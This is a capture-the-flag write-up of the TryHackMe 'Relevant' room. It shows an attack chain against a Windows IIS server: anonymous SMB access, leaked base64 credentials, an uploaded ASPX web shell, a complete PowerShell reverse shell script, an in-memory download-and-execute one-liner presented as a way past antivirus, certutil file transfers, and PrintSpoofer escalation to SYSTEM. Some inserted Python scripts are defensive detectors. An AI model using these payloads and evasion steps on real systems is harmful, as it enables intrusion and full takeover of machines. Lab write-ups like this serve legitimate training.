THM Machine Relevant

Here I solve the THM machine Relevant, where I use the PrintSpoofer exploit to gain a higher-privileged account.


Last updated 2 years ago


Pre-Engagement Briefing

You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.

Scope of Work

The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:

  • User.txt

  • Root.txt

Additionally, the client has provided the following scope allowances:

  • Any tools or techniques are permitted in this engagement, however we ask that you attempt manual exploitation first

  • Locate and note all vulnerabilities found

  • Submit the flags discovered to the dashboard

  • Only the IP address assigned to your machine is in scope

  • Find and report ALL vulnerabilities.

Information Gathering

IP Address

export ip=10.10.111.67

Scanning

I run an nmap scan to find open ports; the result is as follows.

$ nmap -sC --min-rate 100 --max-rate 200 $ip

PORT      STATE SERVICE
80/tcp    open  http
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
| rdp-ntlm-info: 
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2022-08-18T15:08:49+00:00
| ssl-cert: Subject: commonName=Relevant
| Issuer: commonName=Relevant
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-08-17T14:37:56
| Not valid after:  2023-02-16T14:37:56
| MD5:   8705 7420 7bf9 8563 bb66 29f5 cdde fd1d
|_SHA-1: 2c85 81dc 2811 d9b2 0d70 9cf7 593b 6b12 b260 53cc
|_ssl-date: 2022-08-18T15:08:48+00:00; -2m42s from scanner time.
49663/tcp open  http
49667/tcp open  unknown

Host script results:
|_clock-skew: mean: 1h21m18s, deviation: 3h07m50s, median: -2m42s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-08-18T08:08:49-07:00
| smb2-time: 
|   date: 2022-08-18T15:08:48
|_  start_date: 2022-08-18T14:38:15
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

From the above scan result, we see the system has the following open ports and services running on it.

  • Port 80 is running an HTTP service, most likely a Windows IIS web server.

  • Port 135 is running the Microsoft RPC (Remote Procedure Call) service, which is expected when the system is running SMB and NetBIOS.

  • Port 139 is running the NetBIOS session service.

  • Port 445 is running the SMB service, which nmap reports as microsoft-ds.

  • Port 3389 is an RDP (Remote Desktop Protocol) service, and nmap's rdp-ntlm-info script reveals useful information such as the computer name and domain name.

  • Port 49663 is also running an HTTP service.

  • Port 49667 is running a service that nmap could not identify.

Besides that, nmap reported other useful details in the host script results (the OS version, the SMB signing state and the clock skew) that can be read in the scan output above. Now let's move on to enumerating the running services.
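As an added example (not part of the original writeup), the following Python script turns the kind of nmap output shown above into a findings list a report can use: it parses the open-port lines and flags the SMB signing state, the guest session nmap used, the risky TRACE method and the exposed RDP port. The sample text is a constructed excerpt of the scan above; the function names and severity labels are my own.

```python
import re

# Constructed excerpt of the nmap text output shown above (not a live scan).
SAMPLE_NMAP = """\
PORT      STATE SERVICE
80/tcp    open  http
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49663/tcp open  http
49667/tcp open  unknown

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
"""

# One port line of nmap's normal output: "445/tcp   open  microsoft-ds"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_ports(text):
    """Return {port: service} for every line nmap reports as open."""
    ports = {}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            ports[int(m.group(1))] = m.group(4)
    return ports


def find_findings(text):
    """Turn script output into (severity, finding) tuples for the report."""
    findings = []
    ports = parse_ports(text)
    if 445 in ports and re.search(r"message_signing:\s*disabled", text):
        findings.append(("high", "SMB1 message signing disabled on 445/tcp: "
                                 "authentication can be relayed; require signing"))
    if re.search(r"Message signing enabled but not required", text):
        findings.append(("high", "SMB2/3 signing not required: set 'Digitally sign "
                                 "communications (always)' on the server"))
    if re.search(r"account_used:\s*guest", text):
        findings.append(("medium", "SMB accepted a guest/null session: disable guest "
                                   "access and audit share ACLs"))
    m = re.search(r"Potentially risky methods:\s*(.+)", text)
    if m:
        findings.append(("low", f"HTTP methods flagged by nmap: {m.group(1).strip()}; "
                                f"disable TRACE in IIS"))
    if 3389 in ports:
        findings.append(("info", "RDP (3389/tcp) exposed: restrict to management "
                                 "networks and require NLA"))
    return findings


if __name__ == "__main__":
    for severity, finding in find_findings(SAMPLE_NMAP):
        print(f"[{severity}] {finding}")
```

The same parser works on a saved `nmap -oN` file; only the script-specific regexes need extending when more NSE scripts are enabled.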

Enumeration

We saw an SMB service running, so we can start there and see whether it allows guest or anonymous access (logging in without supplying any credentials). We can use the Linux command-line utility smbclient with the following command.

$ smbclient -L \\\\$ip\\

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	nt4wrksv        Disk      

Above we list all the shares on the SMB server and see one that is not present by default: nt4wrksv. The nt4wrksv share also allows anonymous login, since I can connect to it with the following command.

smbclient \\\\$ip\\nt4wrksv

In the share, there is a passwords.txt file that has the following content.

[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

The lines look base64-encoded, so I decode them with the following command.

$ echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d && echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d

This gives the following output.

Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$

These look like credentials, so I tried them on RDP, but they don't work. I keep them in my notes for now and move on to enumerating other services.
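An added example, not from the original page: a small scanner for files like the passwords.txt above that reports base64 lines decoding to user/secret pairs with the secret masked, so a share audit can flag exposed credentials without copying them into the report. The sample file content is constructed from the lines shown above; the strict-decode rule (canonical base64, printable ASCII, "user - secret" layout) is my assumption about the file format.

```python
import base64
import binascii
import re

# Constructed sample mirroring the passwords.txt found on the share, plus a noise line.
SAMPLE_FILE = """\
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
not-base64-at-all!
"""

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def strict_b64decode(token):
    """Decode only canonical base64 that yields printable ASCII; otherwise None."""
    if not B64_RE.match(token) or len(token) % 4:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    if base64.b64encode(raw).decode() != token:  # reject non-canonical padding
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def mask(secret):
    """Keep the first two characters so a finding is recognisable, hide the rest."""
    if len(secret) <= 2:
        return "*" * len(secret)
    return secret[:2] + "*" * (len(secret) - 2)


def find_encoded_credentials(content):
    """Return [(line_no, user, masked_secret)] for lines decoding to 'user - secret'."""
    hits = []
    for n, line in enumerate(content.splitlines(), 1):
        decoded = strict_b64decode(line.strip())
        if decoded is None:
            continue
        user, sep, secret = decoded.partition(" - ")
        if sep and user and secret:
            hits.append((n, user, mask(secret)))
    return hits


if __name__ == "__main__":
    for line_no, user, masked in find_encoded_credentials(SAMPLE_FILE):
        print(f"line {line_no}: credential for '{user}' -> {masked}")
```

Pointing this at every text file pulled from a share gives a quick list of files that need to be removed from anonymous-readable locations, with enough context to identify the owner and nothing that needs redacting afterwards.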

HTTP

More than one HTTP server is running on the machine, and both show only the default Windows IIS page.

Content-Discovery

I use ffuf to discover hidden directories and files, but didn't find any useful directory where the above credentials could be used.

I try the share name nt4wrksv as a path on the web server, and it returns status 200, meaning the directory exists; requesting passwords.txt shows its content. I then try uploading files through the SMB share and succeed, so the writable share is being served by the web server.

Knowing this, we can upload a web shell or reverse shell and execute it by visiting the page. Since it is a Windows IIS server, which runs ASPX or ASP files as its backend, the shell must be written in that language. We could generate one with msfvenom, but I use the cmdasp.aspx web shell found at /usr/share/webshells/aspx/cmdasp.aspx and upload it with the following command.

smb: \> put /usr/share/webshells/aspx/cmdasp.aspx

After that I visit http://$ip/nt4wrksv/cmdasp.aspx, which shows a command execution form where I can submit a command and see its output.

Initial Access

Now I try to get a reverse shell by uploading a reverse shell binary (.exe) generated by msfvenom, but the antivirus deletes it. I also cannot execute the PowerShell reverse shell one-liner, because the antivirus flags it as malicious. After searching on Google I found the following approach: a command that downloads a text file containing PowerShell reverse shell code and executes it in memory, which did not alert the antivirus. This is a staged payload: the first stage requests the second stage and executes it, giving us a reverse shell.

The PowerShell code is the following.

function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
# Setup IPADDR (attacker machine; PowerShell comments use '#', not '//')
$address = '10.11.79.134'
# Setup PORT (listener port)
$port = '4444'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}

There we have to change the $address variable to the attacker machine IP and the $port variable to the port we want to use, then save it as powershell.reverse.txt (or any filename you like) and host it. I use a Python HTTP server for this.

$ python3 -m http.server 80

After hosting the PowerShell file, execute the following command in the command shell obtained through cmdasp.aspx.

powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).downloadString('http://10.11.79.134/powershell.reverse.txt')"

This fetches your powershell.reverse.txt file, downloads it and executes it, and eventually you receive a connection back.

Note: start your netcat listener before executing the above command. For Windows targets I prefer running netcat under rlwrap, which gives the shell line editing and command history.

$ rlwrap nc -lvnp 4444

Privilege Escalation

After gaining initial access to the system, the next goal is a higher-privileged account. To get there we enumerate the system for misconfigurations or plaintext passwords that can be used to escalate.

We can use a tool named winPEAS that automates the basic enumeration and highlights potential paths to higher privileges.

I host winPEAS.bat on a Python HTTP server and transfer it with certutil; it could also be uploaded through the SMB share.

certutil.exe -urlcache -split -f http://10.11.79.134/winPEAS.bat winpeas.bat
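As an added detection example (not the author's code), a Python scorer over constructed process-creation records covers both the PowerShell download cradle used above for initial access and the certutil URL download used here, and again later to fetch PrintSpoofer. It flags the IEX/DownloadString pattern, the -nop -w hidden flags, certutil -urlcache -f with an http URL, and processes spawned by the IIS worker w3wp.exe. Rule names, weights and the alert threshold are my own choices, and the event dictionaries are made up to match the commands on this page.

```python
import re

# Constructed process-creation records in Sysmon Event ID 1 style; not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX(New-Object Net.WebClient)"
                ".downloadString('http://10.11.79.134/powershell.reverse.txt')\""},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://10.11.79.134/winPEAS.bat winpeas.bat"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil -verify -urlfetch machine.cer"},      # benign certutil use
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell Get-Service -Name Spooler"},        # benign PowerShell use
]

# Command-line rules: (name, regex, weight). Weights are illustrative, not a vendor scale.
RULES = [
    ("ps_download_cradle",
     re.compile(r"(?i)\b(IEX|Invoke-Expression)\b.*"
                r"\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b"), 60),
    ("ps_hidden_noprofile",
     re.compile(r"(?i)\s-(nop|noprofile)\b.*\s-w(indowstyle)?\s+hidden\b"), 25),
    ("certutil_url_download",
     re.compile(r"(?i)\bcertutil(\.exe)?\b.*-urlcache\b.*-f\b.*\bhttps?://"), 60),
]

# Parent images that should not normally spawn shells or downloaders.
WEB_WORKER_PARENTS = ("w3wp.exe", "httpd.exe", "nginx.exe", "tomcat")


def score_event(event):
    """Return (score, matched_rule_names) for one process-creation event."""
    score, matched = 0, []
    for name, pattern, weight in RULES:
        if pattern.search(event["cmdline"]):
            score += weight
            matched.append(name)
    # Parent image name only, lower-cased: "...\inetsrv\w3wp.exe" -> "w3wp.exe"
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    if parent.startswith(WEB_WORKER_PARENTS):
        score += 30
        matched.append("web_server_spawned_process")
    return score, matched


def alerts(events, threshold=50):
    """Events scoring at or above the threshold, as (cmdline, score, rules)."""
    out = []
    for event in events:
        score, matched = score_event(event)
        if score >= threshold:
            out.append((event["cmdline"], score, matched))
    return out


if __name__ == "__main__":
    for cmdline, score, matched in alerts(SAMPLE_EVENTS):
        print(f"{score:3d} {matched} :: {cmdline}")
```

The parent-process rule is what separates this from a plain keyword match: a download cradle launched from an IIS worker process is the web shell pattern described above, whereas the same PowerShell flags launched by an administrator's console deserve a lower score. The two benign records show that certutil and PowerShell on their own are not enough to alert.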

After running winPEAS.bat we see that our user holds a privilege that is commonly used for privilege escalation.


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

There we can see SeImpersonatePrivilege is enabled. On Windows, this privilege ("Impersonate a client after authentication") is a well-known privilege escalation path when held by a low-privileged account. Since our user has it enabled, we can use the tool PrintSpoofer, which can be downloaded from the following link.

https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

Download that binary, host it using a Python server or some other way, then download it onto the target system with the following command.

certutil.exe -urlcache -split -f http://10.11.79.134/PrintSpoofer64.exe PrintSpoofer64.exe

Then use the following command to exploit it and obtain a higher-privileged shell.

PrintSpoofer64.exe -i -c cmd.exe

This opens a command prompt as NT AUTHORITY\SYSTEM, the account with full permissions on the system. Secure both the user.txt and root.txt flags and submit them.
